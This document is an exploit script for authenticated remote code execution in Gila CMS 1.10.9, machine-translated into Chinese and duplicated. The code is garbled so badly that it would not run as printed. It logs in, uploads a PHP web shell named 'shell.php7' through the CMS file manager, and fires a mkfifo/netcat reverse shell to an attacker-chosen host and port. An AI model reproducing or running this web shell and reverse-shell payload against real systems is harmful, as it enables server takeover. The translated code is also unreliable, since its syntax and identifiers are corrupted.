#利用标题: Gila CMS 1.10.9-远程代码执行(RCE)(身份验证)
#日期: 05-07-2023
#利用作者: OMER SHAIK(UNKNOWN_EXPLOIT)
#供应商HomePage3360 https://gilacms.com/
#软件link: https://github.com/gilacms/gila/
#版本: GILA 1.10.9
#在: Linux上测试
导入请求
从TermColor导入彩色
来自urllib.parse导入urlparse
#印刷ASCII艺术
ascii_art='''
██████╗██╗██╗█████╗██████╗███╗███╗███████╗██████╗
██╔════╝██║██╔═════╝███╔════════════════╝
██║███╗██║██║███████║██║██╔████╔██║███████╗██████╔╝██║
█║█║██║███████║█║██║███████║██║
╚██████╔╝██║███████╗██║██║╚██████╗██║╚═╝██║███████║██║
╚═════╝╚═════╝╚═╝╚═════╝╚═╝╚═╝╚═╝╚═╝
由unknown_exploit
'''
打印(colored(ascii_art,'green'))
#提示用户用于目标URL
target_url=输入('输入目标登录URL(例如http://example.com/admin/):')
#从目标URL提取域
parsed_url=urlparse(target_url)
域=parsed_url.netloc
target_url_2=f'http://{域}/'
#提示用户登录凭据
用户名=输入('输入电子邮件:')
密码=输入('输入密码:')
#创建会话并执行登录
session=requests.session()
login_payload={
'action':'登录',
'username':用户名,
'password':密码
}
响应=session.post(target_url,data=login_payload)
cookie=response.cookies.get_dict()
var1=cookie ['phpsessid']
var2=cookie ['gsessionid']
#提示用户进行本地IP和端口
lhost=输入('输入本地IP(LHOST):')
lport=input('输入本地端口(LPORT):')
#构造有效载荷
有效载荷=f'rm+/tmp/f%3BMKFIFO+/tmp/f%3BCAT+/tmp/f |/bin/bash/bash+-i+2%261 | nc+{lHost}+{lport}+{lport}+/tmp/tmp/f'
payload_url=f'{target_url_2} tmp/shell.php7?cmd={有效载荷}'
#使用发布请求执行文件上传
upload_url=f'{target_url_2} fm/upload'
upload_headers={
'host':域,
'content Length':'424',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/104.0.5112.102 Safari/537.36',537.36',537.36',
'content-type':'multipart/form-data;边界=---- WebKitformBoundarynky5biijqczc80i2',
'Accept':'/',
'Origin': Target_url_2,
'referer': f'{target_url_2} admin/fm?f=tmp/.htaccess',
'接受编码:'gzip,deflate',
'Accept-Language':'En-US,en; q=0.9',
'cookie': f'phPsessId={var1}; gsessionid={var2}',
'Connection':'关闭'
}
upload_data=f'''
------ webkitformboundarynky5biijqczc80i2
content-disposition: form-data; name='uploadfiles';文件名='shell.php7'
content-type:应用程序/x-php
?php系统($ _ get ['cmd']);
------ webkitformboundarynky5biijqczc80i2
content-disposition: form-data;名称='路径'
TMP
------ webkitformboundarynky5biijqczc80i2
content-disposition: form-data;名称='g_response'
内容
------ webkitformboundarynky5biijqczc80i2--
'''
upload_response=session.post(upload_url,headers=upload_headers,data=upload_data)
如果upload_response.status_code==200:
打印(“成功上传文件”。)
#执行有效载荷
响应=session.get(payload_url)
打印(“有效载荷成功执行。”)
其他:
打印('错误上传文件:',upload_response.text)
#日期: 05-07-2023
#利用作者: OMER SHAIK(UNKNOWN_EXPLOIT)
#供应商HomePage3360 https://gilacms.com/
#软件link: https://github.com/gilacms/gila/
#版本: GILA 1.10.9
#在: Linux上测试
导入请求
从TermColor导入彩色
来自urllib.parse导入urlparse
#印刷ASCII艺术
ascii_art='''
██████╗██╗██╗█████╗██████╗███╗███╗███████╗██████╗
██╔════╝██║██╔═════╝███╔════════════════╝
██║███╗██║██║███████║██║██╔████╔██║███████╗██████╔╝██║
█║█║██║███████║█║██║███████║██║
╚██████╔╝██║███████╗██║██║╚██████╗██║╚═╝██║███████║██║
╚═════╝╚═════╝╚═╝╚═════╝╚═╝╚═╝╚═╝╚═╝
由unknown_exploit
'''
打印(colored(ascii_art,'green'))
#提示用户用于目标URL
target_url=输入('输入目标登录URL(例如http://example.com/admin/):')
#从目标URL提取域
parsed_url=urlparse(target_url)
域=parsed_url.netloc
target_url_2=f'http://{域}/'
#提示用户登录凭据
用户名=输入('输入电子邮件:')
密码=输入('输入密码:')
#创建会话并执行登录
session=requests.session()
login_payload={
'action':'登录',
'username':用户名,
'password':密码
}
响应=session.post(target_url,data=login_payload)
cookie=response.cookies.get_dict()
var1=cookie ['phpsessid']
var2=cookie ['gsessionid']
#提示用户进行本地IP和端口
lhost=输入('输入本地IP(LHOST):')
lport=input('输入本地端口(LPORT):')
#构造有效载荷
有效载荷=f'rm+/tmp/f%3BMKFIFO+/tmp/f%3BCAT+/tmp/f |/bin/bash/bash+-i+2%261 | nc+{lHost}+{lport}+{lport}+/tmp/tmp/f'
payload_url=f'{target_url_2} tmp/shell.php7?cmd={有效载荷}'
#使用发布请求执行文件上传
upload_url=f'{target_url_2} fm/upload'
upload_headers={
'host':域,
'content Length':'424',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/104.0.5112.102 Safari/537.36',537.36',537.36',
'content-type':'multipart/form-data;边界=---- WebKitformBoundarynky5biijqczc80i2',
'Accept':'/',
'Origin': Target_url_2,
'referer': f'{target_url_2} admin/fm?f=tmp/.htaccess',
'接受编码:'gzip,deflate',
'Accept-Language':'En-US,en; q=0.9',
'cookie': f'phPsessId={var1}; gsessionid={var2}',
'Connection':'关闭'
}
upload_data=f'''
------ webkitformboundarynky5biijqczc80i2
content-disposition: form-data; name='uploadfiles';文件名='shell.php7'
content-type:应用程序/x-php
?php系统($ _ get ['cmd']);
------ webkitformboundarynky5biijqczc80i2
content-disposition: form-data;名称='路径'
TMP
------ webkitformboundarynky5biijqczc80i2
content-disposition: form-data;名称='g_response'
内容
------ webkitformboundarynky5biijqczc80i2--
'''
upload_response=session.post(upload_url,headers=upload_headers,data=upload_data)
如果upload_response.status_code==200:
打印(“成功上传文件”。)
#执行有效载荷
响应=session.get(payload_url)
打印(“有效载荷成功执行。”)
其他:
打印('错误上传文件:',upload_response.text)
